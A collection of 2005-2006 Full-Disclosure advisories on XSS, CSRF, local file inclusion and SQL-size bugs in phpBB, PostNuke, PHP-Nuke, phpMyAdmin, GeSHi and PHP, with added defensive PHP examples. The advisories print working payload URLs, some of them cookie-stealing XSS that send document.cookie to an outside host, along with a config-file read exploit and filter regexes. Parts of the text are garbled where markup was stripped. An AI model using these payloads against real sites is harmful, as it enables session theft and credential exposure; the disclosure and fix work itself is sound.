If a PHP script calls phpinfo(), try creating some variables (array) like:

phpinfo.php?cx[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]=[XSS]

or

phpinfo.php?cx[]=c..~4096chars...ccc[XSS]

--- 2. How to fix ---

CVS http://cvs.php.net/viewcvs.cgi/php-src/NEWS

--- 3. Greets ---

For: sp3x and p_e_a, pi3, eax ;]

--- 4. Contact ---

Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
SecurityReason.Com
[Full-disclosure] Re: Mis-diagnosed XSS bugs hiding worse issues due to PHP feature
On Saturday 01 April 2006 10:11, Steven M. Christey wrote:

We reported this XSS (in PHP display_errors) on 28 May 2005.
http://bugs.php.net/bug.php?id=33173&edit=1

Reply from the PHP developers: "Bogus".

"...Show errors is only a convenience thing to aid you while developing. Thus no user will ever see such error messages. So in the end it is not usable for phishing and alike..."

Many functions in PHP are vulnerable to XSS. It is not dangerous, but it can't exist. For example http://securityreason.com/achievement_securityalert/18 or the gpg version: http://securityreason.com/achievement_securityalert/18/1 (function include() in PostNuke).

> In a post-disclosure analysis [1] of a security issue announced by
> rgod [2], Siegfried observed that the reported XSS actually originated
> from a file inclusion vulnerability, in which the XSS was reflected
> back from an error message when the file inclusion failed:
>
> >About the xss, it is an xss in the php error message, there are many
> >php functions returning errors without filtering them, anybody noted
> >that?
>
> Yes.
>
> I would greatly appreciate some corroboration from the real PHP/web
> security experts out there on what I'm about to say. If true, it
> would partly explain why XSS is so rampant in PHP applications.
>
> As I understand it, this behavior is due to an XSS problem in PHP
> itself before 5.1.2 (CVE-2006-0208), as announced in January 2006:
>
> http://www.php.net/release_5_1_2.php
>
> It's not clear if PHP 4.x was affected.
>
> The XSS happens when display_errors and html_errors are enabled - it
> won't quote the output from raw error messages.
>
> No doubt many so-called XSS errors these days are the result of this
> particular issue in PHP. They aren't entirely the application's
> fault, although obviously they indicate the lack of strong input
> validation.
>
> This can hide much more serious vulnerabilities, like file inclusion,
> directory traversal, or SQL injection. I have mentioned this in the
> past, but now we know why this seems to happen so often.
> (Application-controlled error handlers can still be subject to XSS of
> course, even under a fixed PHP.)
>
> For those who do post-disclosure analysis: there *might* be a
> resultant XSS issue if the researcher claims both XSS and another type
> of bug in the same affected parameter/component, or if the
> researcher's report includes error messages that don't seem to be
> sanitizing XSS-tainted output.
>
> - Steve
>
> [1] http://lists.grok.org.uk/pipermail/full-disclosure/2006-March/044756.html
>
> [2] http://retrogod.altervista.org/claroline_174_incl_xpl.html

SecurityReason.Com Europe
--
pub   1024D/7FDF4CEE 2005-09-21
uid                  Maksymilian Arciemowicz (cXIb8O3) <[EMAIL PROTECTED]>
sub   2048g/AE816DB6 2005-09-21
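The thread above notes that application-controlled error handlers can still reflect tainted output. As an added example (not code from either poster or from PHP), an application error handler that escapes what it echoes; the function name html_safe_error_handler() and the pages/ include path are assumptions.

```php
<?php
// Added example, not from the thread's authors or from PHP: an application
// error handler that HTML-escapes every message it echoes, so a request-
// controlled value reflected in an error (a failed include() path, for
// instance) cannot carry markup into the page. The function name is assumed.

function html_safe_error_handler(int $errno, string $errstr, string $errfile, int $errline): bool
{
    // Respect error_reporting(): errors masked there fall through to PHP.
    if ((error_reporting() & $errno) === 0) {
        return false;
    }

    // Escape everything, quotes included; $errstr often contains user input verbatim.
    $esc = static fn(string $s): string =>
        htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');

    // The full, unescaped detail belongs in the server log, not in the response.
    error_log(sprintf('php error %d: %s in %s:%d', $errno, $errstr, $errfile, $errline));

    // What the client sees is escaped. In production, echo a generic message
    // here and keep $errstr (paths, file names) out of the response entirely.
    echo '<p class="error">', $esc($errstr), '</p>', PHP_EOL;

    // Returning true stops PHP from running its own display_errors output,
    // which is the unescaped output this thread is about.
    return true;
}

set_error_handler('html_safe_error_handler');

// Constructed demonstration: the include() target comes straight from the
// request, the include fails, and the path is reflected in the warning text.
// With the handler installed the reflected value arrives escaped.
$_GET['page'] = '<script>alert(1)</script>';
include 'pages/' . $_GET['page'] . '.php';
```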
[Full-disclosure] Multiple vulnerabilities in PostNuke <= 0.761
Source: http://securityreason.com/achievement_securityalert/33

[Multiple vulnerabilities in PostNuke <= 0.761]
SecurityAlert SA033

Author: Maksymilian Arciemowicz (cXIb8O3)
Date: 19.2.2006
from SecurityReason.Com

--- 0. Description ---

PostNuke: The Phoenix Release (0.761)

PostNuke is an open source, open development content management system (CMS). PostNuke started as a fork from PHPNuke (http://www.phpnuke.org) and provides many enhancements and improvements over the PHP-Nuke system. PostNuke is still undergoing development but a large number of core functions are now stabilising and a complete API for third-party developers is now in place.

If you would like to help develop this software, please visit our homepage at http://noc.postnuke.com/

You can also visit us on our IRC Server irc.postnuke.com channel #postnuke-support #postnuke-chat #postnuke

Or at the Community Forums located at: http://forums.postnuke.com/

--- 1. Bypass pnVarCleanFromInput() and pnAntiCracker ---

In PostNuke there is the function pnVarCleanFromInput() (file includes/pnAPI.php).

-419-515---
function pnVarCleanFromInput()
{
    // Create an array of bad objects to clean out of input variables
    $search = array('||si',
                    '||si',
                    '||si',
                    '||si',
                    '||si',
                    '||si',
                    '||si',
                    '|STYLE\s*=\s*"[^"]*"|si');

    // Create an empty array that will be used to replace any malacious code
    $replace = array('');
    ...
-419-515---

and the function pnSecureInput() (file includes/pnAntiCracker.php).

-31-109---
function pnSecureInput()
{
    // Cross-Site Scripting attack defense - Sent by larsneo
    // some syntax checking against injected javascript
    // extended by Neo
    if (count($_GET) > 0) {
        //Lets now sanitize the GET vars
        foreach ($_GET as $secvalue) {
            if (!is_array($secvalue)) {
                if ((eregi("<[^>]*script.*\"?[^>]*>", $secvalue)) ||
                    (eregi(".*[[:space:]](or|and)[[:space:]].*(=|like).*", $secvalue)) ||
                    (eregi("<[^>]*object.*\"?[^>]*>", $secvalue)) ||
                    (eregi("<[^>]*iframe.*\"?[^>]*>", $secvalue)) ||
                    (eregi("<[^>]*applet.*\"?[^>]*>", $secvalue)) ||
                    (eregi("<[^>]*meta.*\"?[^>]*>", $secvalue)) ||
                    (eregi("<[^>]*style.*\"?[^>]*>", $secvalue)) ||
                    (eregi("<[^>]*form.*\"?[^>]*>", $secvalue)) ||
                    (eregi("<[^>]*window.*\"?[^>]*>", $secvalue)) ||
                    (eregi("<[^>]*alert.*\"?[^>]*>", $secvalue)) ||
                    (eregi("<[^>]*img.*\"?[^>]*>", $secvalue)) ||
                    (eregi("<[^>]*document.*\"?[^>]*>", $secvalue)) ||
                    (eregi("<[^>]*cookie.*\"?[^>]*>", $secvalue)) ||
                    (eregi("\"", $secvalue))) {
                    pnMailHackAttempt('pnAntiCracker',__LINE__,'pnSecurity Alert','GET Intrusion detection.');
                    Header("Location: index.php");
                }
            }
        }
    }
    //Lets now sanitize the POST vars
    if ( count($_POST) > 0) {
        foreach ($_POST as $secvalue) {
            if (!is_array($secvalue)) {
                if ((eregi("<[^>]*script.*\"?[^>]*>", $secvalue)) ||
                    (eregi("<[^>]*object.*\"?[^>]*>", $secvalue)) ||
                    (eregi("<[^>]*iframe.*\"?[^>]*>", $secvalue)) ||
                    (eregi("<[^>]*applet.*\"?[^>]*>", $secvalue)) ||
                    (eregi("<[^>]*window.*\"?[^>]*>", $secvalue)) ||
                    (eregi("<[^>]*alert.*\"?[^>]*>", $secvalue)) ||
                    (eregi("<[^>]*document.*\"?[^>]*>", $secvalue)) ||
                    (eregi("<[^>]*cookie.*\"?[^>]*>", $secvalue)) ||
                    (eregi("<[^>]*meta.*\"?[^>]*>", $secvalue)) ) {
                    pnMailHackAttempt('pnAntiCracker',__LINE__,'pnSecurity Alert','POST Intrusion detection.');
RE: [Full-disclosure] phpBB 2.0.19 Cross Site Request Forgeries and XSSAdmin
> From: Berliner
> 1. Basically all phpBB admin-side options do allow full HTML, including
> javascript. That is the intended behaviour, as there are legitimate uses.
>
> phpBB does however check the Session ID before allowing the changes to go to
> the database.
> Your exploit needs a valid admin session key and you need to get the admin
> to visit the page (unless you happen to have a lot of luck with your IP)- be
> it by a link or a reflecting page. And even then, it will only work, when
> the admin has logged into the ACP prior to running into the trap.

$sid='';
preg_match('#sid\=?([0-9a-z]*)#i', getenv('HTTP_REFERER'), $sid);
if($sid[1]!=''){
    header("Location: ".$operation."&sid=".$sid[1]);

If you have, for example, http://SOME.SCRIPT.PHP";> and you send the referer... (tested in IE, Mozilla etc.), then please check..

getenv('HTTP_REFERER')

The phpBB team was informed about these issues and they confirmed that these vulnerabilities exist in phpBB 2.0.19. The solution is to use POST for all operations.

> 2. That is a general problem with all pages allowing of-site pictures. It
> has been discussed on the list before. Most of your examples won't work with
> phpBB, due to the missing Session ID in the links.

--
pub   1024D/7FDF4CEE 2005-09-21
uid                  Maksymilian Arciemowicz (cXIb8O3) <[EMAIL PROTECTED]>
sub   2048g/AE816DB6 2005-09-21
[Full-disclosure] phpBB 2.0.19 Cross Site Request Forgeries and XSS Admin
Original Source: http://securityreason.com/achievement_securityalert/31

[phpBB 2.0.19 Cross Site Request Forgeries and XSS Admin]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date: 3.2.2006
from SecurityReason.Com
CVE-2006-0437 for the XSS issues
CVE-2006-0438 for the CSRF issues

--- 0. Description ---

phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin board package. phpBB has a user-friendly interface, simple and straightforward administration panel, and helpful FAQ. Based on the powerful PHP server language and your choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal free community solution for all web sites.

Contact with author http://www.phpbb.com/about.php.

--- 1. XSS admin ---

In admin/admin_smilies.php you can create and modify smilies. Nothing special, but phpBB doesn't check what goes into the db.

case savenew

-448-473---
    $smile_code = ( isset($HTTP_POST_VARS['smile_code']) ) ? $HTTP_POST_VARS['smile_code'] : $HTTP_GET_VARS['smile_code'];
    $smile_url = ( isset($HTTP_POST_VARS['smile_url']) ) ? $HTTP_POST_VARS['smile_url'] : $HTTP_GET_VARS['smile_url'];
    $smile_url = phpbb_ltrim(basename($smile_url), "'");
    $smile_emotion = ( isset($HTTP_POST_VARS['smile_emotion']) ) ? $HTTP_POST_VARS['smile_emotion'] : $HTTP_GET_VARS['smile_emotion'];

    $smile_code = trim($smile_code);
    $smile_url = trim($smile_url);
    $smile_emotion = trim($smile_emotion);

    // If no code was entered complain ...
    if ($smile_code == '' || $smile_url == '')
    {
        message_die(GENERAL_MESSAGE, $lang['Fields_empty']);
    }

    //
    // Convert < and > to proper htmlentities for parsing.
    //
    $smile_code = str_replace('<', '&lt;', $smile_code);
    $smile_code = str_replace('>', '&gt;', $smile_code);

    //
    // Save the data to the smiley table.
    //
    $sql = "INSERT INTO " . SMILIES_TABLE . " (code, smile_url, emoticon)
        VALUES ('" . str_replace("\'", "''", $smile_code) . "', '" . str_replace("\'", "''", $smile_url) . "', '" . str_replace("\'", "''", $smile_emotion) . "')";
    $result = $db->sql_query($sql);
-448-473---

Only "<" and ">" are restricted.

http://[HOST]/[DIR]/admin/admin_smilies.php?mode=savenew&smile_code=:x:&smile_url=icon_mrgreen.gif&smile_emotion=c"; onmouseover="alert('SecurityReason.Com')" &sid=SIDofADMIN

'alert("SecurityReason.Com")'%20&sid=SIDofADMIN

http://[HOST]/[DIR]/admin/admin_smilies.php?mode=savenew&smile_code=:q:&smile_url=icon_mrgreen.gif"%20onmouseover="alert(document.location='http://[SRVER]/cookies?'+document.cookie)"%20&sid=SIDofADMIN

and you have a new smiley. Of course you can do a better exploit, for IE etc.

--- 2. Cross Site Request Forgeries ---

In the Administration Panel the phpBB admin has the SID in the URL. OK. For example, if you want to see a user profile, or split or lock someone's post, etc. Like:

http://[HOST]/[DIR]/admin/admin_users.php?sid=88eafcce6dddcee3fccc08de7ec505d0
http://[HOST]/[DIR]/modcp.php?t=2&mode=split&sid=c1db64124b7ced0668dec5900fed3b35

etc.

If this user has "Link to off-site Avatar" ON, or bbcode (IMG) is ON, then you can create a URL to a script that uses the admin's referer. So when the admin opens the profile the URL will be executed. The referer needs to be in the request.

The next problem is:

103# if ( !preg_match("#^((ht|f)tp://)([^ \?&=\#\"\n\r\t<]*?(\.(jpg|jpeg|gif|png))$)#is", $avatar_filename) )

in includes/unsercp_avatar.php. Why? Because this preg() doesn't have a limit on chars. In the mysql phpbb DB you have (*_users) user_avatar varchar(100); only 100 chars will go to the db. So you can post a URL like:

http://[HOST]/[DIR]/script.php/[100 chars].jpg

Sent:

http://[HOST]/[DIR]/script.php/securityreasonsecurityreasonsecurityreasonsecurityreasonsecurityreasonsecur.jpg

and in the db is:

http://[HOST]/[DIR]/script.php/securityreasonsecurityreasonsecurityreasonsecurityreasonsecurityreasonsecur

or in bbcode (IMG):

http://[HOST]/[DIR]/script.php/securityreason.jpg

Nothing special.. OK.. You need to create a new user (the nick name can be "FUCKmeADMIN" etc.) and upload one script. It doesn't need to be on the server where phpBB is.

-script.php--
http://[HOST]/[DIR]/admin/admin_smilies.php?mode=savenew&smile_code=try&smile_url=icon_mrgreen.gif"%20onmouseover=\'alert("SecurityReason.Com)\'%20';
# http://[host]/admin/admin_smilies.php?mode=savenew&smile_code=a&smile_url=ico
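The follow-up reply to this advisory says the fix is to use POST for all operations. As an added example (not phpBB code and not from the advisory), a state-changing admin action gated on POST plus a per-session CSRF token, with output escaping that covers quotes and not only < and >; the function names, the csrf_token field and the placeholder action are assumptions.

```php
<?php
// Added example, not phpBB code: POST-only state changes plus a per-session
// token, so that neither a link, an off-site avatar/IMG fetch nor a crafted
// Referer can drive the admin action. Names and the action are assumed.
session_start();

function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function csrf_check(): bool
{
    // Only POST may change state: the same parameters on a GET are refused,
    // so an <img src=...> or a link cannot trigger the action on its own.
    if (($_SERVER['REQUEST_METHOD'] ?? 'GET') !== 'POST') {
        return false;
    }
    $sent = $_POST['csrf_token'] ?? '';
    // The token lives in the session, not in the URL (unlike the SID the
    // advisory shows), and is compared in constant time; the Referer header
    // is not consulted at all.
    return isset($_SESSION['csrf_token'])
        && is_string($sent)
        && hash_equals($_SESSION['csrf_token'], $sent);
}

function h(string $s): string
{
    // Escape quotes too: converting only < and > leaves attribute injection open.
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

if (($_SERVER['REQUEST_METHOD'] ?? 'GET') === 'POST') {
    if (!csrf_check()) {
        http_response_code(403);
        exit('Request refused: missing or invalid CSRF token.');
    }
    // Placeholder for the real admin action (e.g. storing a smiley).
    $raw = $_POST['smile_url'] ?? '';
    $smile_url = is_string($raw) ? basename($raw) : '';
    echo '<p>Saved smiley ', h($smile_url), '</p>';
}
?>
<form method="post" action="">
  <input type="hidden" name="csrf_token" value="<?= h(csrf_token()) ?>">
  <input type="text" name="smile_url">
  <button type="submit">Save</button>
</form>
```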
[Full-disclosure] phpBB 2.0.18 XSS and Full Path Disclosure
[phpBB 2.0.18 XSS and Full Path Disclosure cXIb8O3.22]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date: 16.12.2005
from securityreason.com TEAM

--- 0. Description ---

phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin board package. phpBB has a user-friendly interface, simple and straightforward administration panel, and helpful FAQ. Based on the powerful PHP server language and your choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal free community solution for all web sites.

Contact with author http://www.phpbb.com/about.php.

--- 1. XSS ---

If in phpBB "Allowed HTML tags" is ON (e.g. b,i,u,pre) and you have "Always allow HTML: YES" in your profile, or you are a Guest, then you can use these tags:

H E L O

Exploit:

http://HOST/cookies?'+document.cookie)" X=" H A L O

and you have the cookies.

--- 2. Full Path Disclosure ---

In file admin/admin_disallow.php is:

-25-31---
if( !empty($setmodules) )
{
    $filename = basename(__FILE__);
    $module['Users']['Disallow'] = append_sid($filename);
    return;
}
-25-31---

The function append_sid() doesn't exist. And if you have:

register_globals = On
display_errors = On

Try to go to:

http://[HOST]/[DIR]/admin/admin_disallow.php?setmodules=1

-RESULT ERROR---
Fatal error: Call to undefined function: append_sid() in /www/2018/phpBB2/admin/admin_disallow.php on line 28
-RESULT ERROR---

--- 3. Greets ---

sp3x

--- 4. Contact ---

Author: Maksymilian Arciemowicz < cXIb8O3 >
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
securityreason.com TEAM
[Full-disclosure] Bypass XSS filter in PHPNUKE 7.9=>x
[Bypass XSS filter in PHPNUKE 7.9=>x cXIb8O3.21]

Author: Maksymilian Arciemowicz ( cXIb8O3 )
Date: 14.12.2005
from SECURITYREASON.COM

--- 0. Description ---

PHP-Nuke is a Web Portal System, storytelling software, news system, online community or whatever you want to call it. Its goal is to have an automated web site to distribute news and articles with user system. Each user can submit comments to discuss the articles, similar to Slashdot and many others.

Features: web admin, polls/surveys with comment, statistics, user customizable box, themes manager, friendly admin GUI, moderation system, sections manager, banner system, backend/headlines generation, Yahoo like search engine, Ephemerids manager, file manager, download manager, faq manager, advanced blocks system, reviews system, newsletter, content management, encyclopedia generator, md5 password encryption, phpBB Forums integration, support for 25 languages, 100% modular and more. Written 100% in PHP and requires Apache, PHP and a SQL Database Server. Supports MySQL, PostgreSQL, Adabas, mSQL and many others.

--- 1. Bypass XSS filter ---

In PHP-Nuke there is (file includes/mainfile.php):

-168-193---
if (!defined('ADMIN_FILE') && !file_exists('includes/nukesentinel.php')) {
    foreach ($_GET as $sec_key => $secvalue) {
        if ((eregi("<[^>]*script*\"?[^>]*>", $secvalue)) ||
            (eregi("<[^>]*object*\"?[^>]*>", $secvalue)) ||
            (eregi("<[^>]*iframe*\"?[^>]*>", $secvalue)) ||
            (eregi("<[^>]*applet*\"?[^>]*>", $secvalue)) ||
            (eregi("<[^>]*meta*\"?[^>]*>", $secvalue)) ||
            (eregi("<[^>]*style*\"?[^>]*>", $secvalue)) ||
            (eregi("<[^>]*form*\"?[^>]*>", $secvalue)) ||
            (eregi("<[^>]*img*\"?[^>]*>", $secvalue)) ||
            (eregi("<[^>]*onmouseover*\"?[^>]*>", $secvalue)) ||
            (eregi("<[^>]*body*\"?[^>]*>", $secvalue)) ||
            (eregi("\([^>]*\"?[^)]*\)", $secvalue)) ||
            (eregi("\"", $secvalue)) ||
            (eregi("forum_admin", $sec_key)) ||
            (eregi("inside_mod", $sec_key))) {
            die ($htmltags);
        }
    }
    foreach ($_POST as $secvalue) {
        if ((eregi("<[^>]*onmouseover*\"?[^>]*>", $secvalue)) ||
            (eregi("<[^>]script*\"?[^>]*>", $secvalue)) ||
            (eregi("<[^>]*body*\"?[^>]*>", $secvalue)) ||
            (eregi("<[^>]style*\"?[^>]*>", $secvalue))) {
            die ($htmltags);
        }
    }
}
-168-193---

This function deletes from the input HTML tags like:

-
[Full-disclosure] phpBB 2.0.18 SQL Query problem
[phpBB 2.0.18 SQL Query problem cXIb8O3.19]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date: 11.11.2005
from securityreason.com TEAM

--- 0. Description ---

phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin board package. phpBB has a user-friendly interface, simple and straightforward administration panel, and helpful FAQ. Based on the powerful PHP server language and your choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal free community solution for all web sites.

Contact with author http://www.phpbb.com/about.php.

--- 1. * SQL query problem ---

phpBB2 doesn't check the size of the SQL query, so we can send any data in all POST variables.

Standard Environment:
post_max_size=8M (standard)
max_allowed_packet < 7M (1M standard in mysql)

Example Environment:
memory_limit>8MB
max_execution_time=30
max_allowed_packet=1M

I have written a simple request where one POST variable to the SQL query was 1M.

---request---
POST /2018/phpBB2/search.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: strlen(x)

mode=results&search_keywords=SecurityReasonComSecurityRea...xMB>max_allowed_packet. (example.1MB.data)...sonCom
---/request---

so in the output:

---output1---
Could not obtain matched posts list

DEBUG MODE

SQL Error : 1153 Got a packet bigger than 'max_allowed_packet'

SELECT m.post_id FROM phpbb_search_wordlist w, phpbb_search_wordmatch m WHERE w.word_text LIKE 'securityreasoncomsecurityreasoncom...' AND m.word_id = w.word_id AND w.word_common <> 1 AND m.title_match = 0

Line : 321
File : search.php
---/output1---

SQL error.

Or when you have:

memory_limit=8MB
or
max_execution_time<30
display_error=1

You can see in the output, for example:

---output2---
Fatal error: Maximum execution time of 15 seconds exceeded in /www/2018/phpBB2/includes/functions_search.php on line 72
---/output2---

---output3---
Fatal error: Allowed memory size of 8388608 bytes exhausted (tried to allocate 1746401 bytes) in /www/2018/phpBB2/includes/functions_search.php on line 27
---/output3---

Exploit: http://securityreason.com/achievement_exploitalert/4 (simple errors)

--- 2. Greets ---

sp3x

--- 3. Contact ---

Author: Maksymilian Arciemowicz < cXIb8O3 >
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
securityreason.com TEAM
[Full-disclosure] Re: Advisory 16/2005: phpMyAdmin Local File Inclusion Vulnerability (Stefan Esser)
It is a low local file inclusion. Not critical. By default you have $cfg['ThemePath']. A more critical bug still exists in phpMyAdmin:

phpMyAdmin-2.6.4-pl3/libraries/database_interface.lib.php?cfg[Server][extension]=../../mGPC_muss_be_off_%00

org. adv. http://securityreason.com/achievement_securityalert/1

Maksymilian Arciemowicz
[EMAIL PROTECTED]
SecurityReason.Com
[Full-disclosure] phpMyAdmin Local file inclusion 2.6.4-pl1
[phpMyAdmin Local file inclusion 2.6.4-pl1]

Author: Maksymilian Arciemowicz ( cXIb8O3 ).18
Date: 10.10.2005
from SECURITYREASON.COM

--- 0. Description ---

phpMyAdmin 2.6.4 is a tool written in PHP intended to handle the administration of MySQL over the Web. Currently it can create and drop databases, create/drop/alter tables, delete/edit/add fields, execute any SQL statement, manage keys on fields. blablabla...

phpMyAdmin is a very dangerous script.

--- 1. Local file inclusion (Critical) ---

File: ./libraries/grab_globals.lib.php

This file is included by many files. Example file index.php:

-index.php--
/* $Id: index.php,v 2.14 2004/10/19 17:23:09 nijel Exp $ */
// vim: expandtab sw=4 ts=4 sts=4:

/**
 * Gets core libraries and defines some variables
 */
require_once('./libraries/grab_globals.lib.php');
require_once('./libraries/common.lib.php');
...
-index.php--

OK so. In ./libraries/grab_globals.lib.php we have:

-101-104-grab_globals.lib.php-
if ( ! empty( $__redirect ) ) {
    require('./' . $__redirect);
    exit();
} // end if ( ! empty( $__redirect ) )
-101-104-grab_globals.lib.php-

But before that we have:

-53-67-grab_globals.lib.php---
// check if a subform is submitted
$__redirect = NULL;
if ( isset( $_POST['usesubform'] ) ) {
    // if a subform is present and should be used
    // the rest of the form is deprecated
    $subform_id = key( $_POST['usesubform'] );
    $subform    = $_POST['subform'][$subform_id];
    $_POST      = $subform;
    if ( isset( $_POST['redirect'] )
      && $_POST['redirect'] != basename( $_SERVER['PHP_SELF'] ) ) {
        $__redirect = $_POST['redirect'];
        unset( $_POST['redirect'] );
    } // end if ( isset( $_POST['redirect'] ) )
} // end if ( isset( $_POST['usesubform'] ) )
// end check if a subform is submitted
-53-67-grab_globals.lib.php---

If the variable $_POST['usesubform'] exists and is an array, then we can create new variables for $_POST (for example $_POST['redirect']).

$subform = $_POST['subform'][$subform_id];
$_POST = $subform;

where array $_POST = array $_POST[subform][1], so that $_POST['redirect']=$_POST[subform][1][redirect] and we have local file inclusion.

Example response in HTML:

-Exploit---
File
-Exploit---

Exploit: http://securityreason.com/achievement_exploitalert/2

--- 2. Greets ---

sp3x

--- 3. Contact ---

Author: Maksymilian Arciemowicz < cXIb8O3 >
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG-KEY: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
WWW: http://securityreason.com
[Full-disclosure] GeSHi Local PHP file inclusion 1.0.7.2
[GeSHi Local PHP file inclusion 1.0.7.2]

Author: Maksymilian Arciemowicz ( cXIb8O3 ).17
Date: 21.9.2005
from SECURITYREASON.COM

--- 0. Description ---

GeSHi started as a mod for the phpBB forum system, to enable highlighting of more languages than the available (which was 0 ;)). However, it quickly spawned into an entire project on its own. But now it has been released, work continues on a mod for phpBB - and hopefully for many forum systems, blogs and other web-based systems.

Several systems are using GeSHi now, including:

PostNuke - A popular open source CMS
Docuwiki - An advanced wiki engine
gtk.php.net - Their manual uses GeSHi for syntax highlighting
WordPress - A powerful blogging system
PHP-Fusion - A constantly evolving CMS
SQL Manager - A Postgres DBAL
Mambo - A popular open source CMS
MediaWiki - A leader in Wikis
TikiWiki - A megapowerful Wiki/CMS, and one I personally use
RWeb - A site-building tool

--- 1. Local (PHP) file inclusion ---

I have found one bug in the file ./contrib/example.php. This file exists in the standard GeSHi package. In the file:

-10-18-line---
include('../geshi.php');

if ( isset($_POST['submit']) ) {
    if ( get_magic_quotes_gpc() ) $_POST['source'] = stripslashes($_POST['source']);
    if ( !strlen(trim($_POST['source'])) ) {
        $_POST['source'] = implode('', @file('../geshi/' . $_POST['language'] . '.php'));
        $_POST['language'] = 'php';
    }
-10-18-line---

OK.. so, if the variables $_POST['submit'] and $_POST['language'] exist, you can read any PHP file (for example config.php in PostNuke). You need to use the variable $_POST['language'], which is the path to the PHP file.

I have tested this bug in the GeSHi package and in PostNuke 0.760.

PostNuke 0.760 (file: ./modules/pn_bbcode/pnincludes/contrib/example.php)

We can read config.php in PostNuke, where we have login, password, dbname and dbhost. All variables needed to log in to the database. So we can just use this exploit below:

--- EXPLOIT TESTED IN POSTNUKE 0.760 ---
http://securityreason.com"; target="http://securityreason.com/";>http://securityreason.com/gfx/small_logo.png";>
http://[HOST]/modules/pn_bbcode/pnincludes/contrib/example.php"; method="post">
Path to file: example: ../../../../config
--- EXPLOIT FOR POSTNUKE 0.760 ---

[HOST] = example. http://www.securityreason.com/postnuke/html

any questions? ;]

--- 2. How to fix ---

Patch http://securityreason.com/patch/2 works in PostNuke 0.760, or the new version of the script, 1.0.7.3.

--- 3. Greets ---

sp3x

--- 4. Contact ---

Author: Maksymilian Arciemowicz < cXIb8O3 >
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG-KEY: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
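Both the phpMyAdmin require('./' . $__redirect) and the GeSHi file('../geshi/' . $_POST['language'] . '.php') above build a path from request data with no check on where it resolves. As an added example serving both advisories (not code from either project), a resolver that only accepts a bare identifier and confirms the resolved file lies inside a fixed directory; the function name resolve_in_dir() and the constructed fixture directory are assumptions.

```php
<?php
// Added example, not from phpMyAdmin or GeSHi: resolve a request-supplied
// name to a file strictly inside one directory. Names are assumed.

function resolve_in_dir(string $baseDir, string $name, string $ext): ?string
{
    $realBase = realpath($baseDir);
    if ($realBase === false) {
        return null;
    }
    // A bare identifier only: no separators, no dots, no NUL, so neither
    // "../../config" nor "%00" truncation tricks get anywhere near the path.
    if (preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $name) !== 1) {
        return null;
    }
    $candidate = realpath($realBase . DIRECTORY_SEPARATOR . $name . $ext);
    // realpath() collapses symlinks, so a link pointing outside is caught too.
    $expected = $realBase . DIRECTORY_SEPARATOR;
    if ($candidate === false
        || strncmp($candidate, $expected, strlen($expected)) !== 0
        || !is_file($candidate)) {
        return null;
    }
    return $candidate;
}

// Constructed fixture: a language directory containing one legitimate file.
$dir = sys_get_temp_dir() . '/geshi_langs_' . getmypid();
mkdir($dir);
file_put_contents($dir . '/php.php', "<?php // highlighter definition\n");

var_dump(resolve_in_dir($dir, 'php', '.php') !== null);      // bool(true)
var_dump(resolve_in_dir($dir, '../../config', '.php'));      // NULL
var_dump(resolve_in_dir($dir, "php\0", '.php'));             // NULL

unlink($dir . '/php.php');
rmdir($dir);
```

The same resolver fits the phpMyAdmin case by pointing $baseDir at the script directory and $ext at '.php', with the result passed to require() instead of the raw $__redirect.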